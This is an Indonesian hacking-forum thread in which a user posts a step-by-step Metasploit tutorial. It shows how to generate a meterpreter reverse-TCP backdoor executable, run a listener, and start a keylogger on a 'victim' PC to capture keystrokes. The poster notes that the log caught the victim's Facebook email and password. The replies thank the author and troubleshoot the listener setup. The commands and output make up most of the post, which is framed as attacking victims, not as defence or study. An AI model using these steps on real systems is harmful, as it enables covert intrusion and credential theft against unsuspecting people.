mengaktifkan keylogger dengan meterpreter - Printable Version +- Indonesian Back|Track Team (https://www.indonesianbacktrack.or.id/forum) +-- Forum: Attacker Zone (https://www.indonesianbacktrack.or.id/forum/forum-169.html) +--- Forum: Exploitation (https://www.indonesianbacktrack.or.id/forum/forum-43.html) +---- Forum: Metasploit (https://www.indonesianbacktrack.or.id/forum/forum-122.html) +---- Thread: mengaktifkan keylogger dengan meterpreter (/thread-1115.html) |
mengaktifkan keylogger dengan meterpreter - zee eichel - 11-05-2011 Udah lama gk nulis mengenai meterpreter di blog ini… hmm memang sangar sih ahhahaha..ya udah langsung ja. Artikel metasploit kali ini adalah tentang bagaimana kita mengaktifkan keylogger setelah kita mendapatkan akses meterpreter di pc korban. +=======================+ + vurln on +=======================+ + +windows xp1, xp2, xp3 +windows vista +windows 7 +windows 8 + +=======================+ hmmm ya udah kita coba praktekan yah… pertama2 sih ane menjalankan perintah-perintah metasploit payload standart Code: zee@eichel:~# ifconfig Perintah di atas tadi adalah agar kita bisa tau ip address yang hendak kita pasang di msfcli (listener) dan msfpayload (backdoor) +———————+ +creating backdoor + +———————+ zee@eichel:~# msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.3 x > /var/www/bd.exe Created by msfpayload (http://www.metasploit.com). Payload: windows/meterpreter/reverse_tcp Length: 290 Options: {“LHOST”=>”192.168.1.3″} Perintah di atas adalah perintah untuk membuat backdoor berbasis windows dan membuka meterpreter dengan LHOST yang diisikan IP kita , kemudian akan tersimpan di directory /var/www . +——————+ +listener mode on +——————-+ Code: zee@eichel:~# msfcli multi/handler PAYLOAD=windows/meterpreter/reverse_tcp_allports LHOST=192.168.1.3 LPORT=4444 E ok tahap listener sudah selesai… kita tinggal menunggu signal dari backdoor yang telah kita buat tadi dan ane anggap sudah di dalam komputer target dan diesekusi oleh si target. dan setelah di esekusi target … Code: PAYLOAD => windows/meterpreter/reverse_tcp_allports yup meterpreter sudah terbuka pada [192.168.3] port 4444 dan di akses oleh komputer target [192.168.14] pada port 1054 +————————–+ +gathering information+ +————————–+ selanjutnya kita cek informasinya … Code: meterpreter > sysinfo hmmmm selanjutnya kita tinggal menjalankan inti pembicaraan kita ok menjalankan service keylogger di sana … ok deh Code: meterpreter > run keylogrecorder dengan melihat hasil command di atas dapat kita lihat bahwa meterpreter secara otomatis mencari proses explorer.exe yang berjalan di komputer target dan secara otomatis melakukan migrating ke pid tersebut (1508). Secara manual biasanya kita melakukan perintah ps untuk melihat proses kemudian dilanjutkan dengan migrating [pid] [proses id]. Hasil dari rekaman keylogger dari setiap keystroke korban disimpan di /root/.msf4/logs/scripts/keylogrecorder/192.168.1.14_20111105.5810.txt ironis memang klo disaat kita memulai keylogger tersebut jika misalkan si korban meninggalkan komputer gara-gara kebelet, atau di telp pacar sehingga dia tidak mengetik apa-apa sehingga tidak ada log yang tercipta untuk “last keystroke” yang telah di record pada dir di atas. Untuk itu kita jalankan proses recording di background saja Code: meterpreter > run keylogrecorder saya membatalkan proses recording pertama kemudian melanjutkanya dengan proses bgrun. kita cek iddle time dari korban meterpreter > idletime User has been idle for: 2 mins 20 secs ternyata sudah 2 menitan korban iddle atau tidak melakukan kegiatan keyboard maupun mouse. +———-+ +hasil log+ +———-+ Ane melakukan testing terhadap keylogger stroke yang telah merekam dan secara otomatis di simpan pada directory /root/.msf4/logs/scripts/keylogrecorder/ Code: zee@eichel:~# less /root/.msf4/logs/scripts/keylogrecorder/192.168.1.14_20111105.5950.txt atau kita bisa melihat dengan menggunakan cara Code: zee@eichel:~/.msf4/logs/scripts/keylogrecorder# grep -v ^$ 192.168.1.14_20111105.5950.txt|more nah melihat log seperti ini sih sebenarnya tinggal dari logika saja… karena berbeda dengan sniffing yang merekam semua user name dan password…keystroke keylogger mencuri semua hasil keystroke atau hasil penekanan terhadap keyboard sehingga apa saja yang di ketik oleh korban akan terekam… dan tentu saja agak sulit untuk kita melihat mana yang password mana yang bukan… tapi di lihat dari log di atas agaknya korban membuka browser kemudian mengetik facebook.com untuk memanggil site tersebut pada url bar, lalu memasukan email dan password pada tab login. semoga berguna tutor saya kali ini.. di sadur dari postingan asli http://zeestuff.wordpress.com/2011/11/05/mengaktifkan-keylogger-dengan-meterpreter/ trimsssss thx to : skeleton_flowers class training for this inspiration .. special for nasa, oyi, eazaezz, iyan_squid .. and my brother liyan oz .. for all staff and member IBT ... RE: mengaktifkan keylogger dengan meterpreter - NoseTrave - 11-05-2011 I love backtrack Wah Om Zee Sangat Bermanfaat Thanks! RE: mengaktifkan keylogger dengan meterpreter - cassaprodigy - 11-05-2011 wah mantap zee... worked on win 8 pula... sippp thx for this tutorial RE: mengaktifkan keylogger dengan meterpreter - THJC - 11-05-2011 wah keren... win8 ternyata masih mengandung vulnerable RE: mengaktifkan keylogger dengan meterpreter - blackmiracle - 11-05-2011 om port yang terbuka di korban harus port 1054 aja yah om??klo port lain yang terbuka gimana tuh om?? RE: mengaktifkan keylogger dengan meterpreter - koecroet - 11-05-2011 (11-05-2011, 02:03 PM)blackmiracle Wrote: om port yang terbuka di korban harus port 1054 aja yah om??klo port lain yang terbuka gimana tuh om?? yg terpenting udah masuk ke meterpreternya om RE: mengaktifkan keylogger dengan meterpreter - blackmiracle - 11-05-2011 om ane ada masalah disini nih ??..napa yah ?? Code: msfcli multi/handler PAYLOAD=windows/meterpreter/reverse_tcp_allports LHOST=192.168.56.1 LPORT=4444 E RE: mengaktifkan keylogger dengan meterpreter - cassaprodigy - 11-05-2011 dilihat dari prosesnya om sudah memakali port 4444 ... jadi om harus kill dulu .. cek saja dengan netstat RE: mengaktifkan keylogger dengan meterpreter - blackmiracle - 11-05-2011 (11-05-2011, 02:55 PM)cassaprodigy Wrote: dilihat dari prosesnya om sudah memakali port 4444 ... jadi om harus kill dulu .. cek saja dengan netstat oh gitu om..yah sih tadi saya pake itu sampe 3 kali..soalnya error mulu om..klo warning kernel panik diatas maksudnya apa yah om??takut ada masalah nih ma BTnya.. RE: mengaktifkan keylogger dengan meterpreter - xsan-lahci - 11-05-2011 bagus nh treadnya,waktu iitu saya pernah baca tapi msfgui ka,sebenernya sama aja atau lebih powerfull yang ini ?? |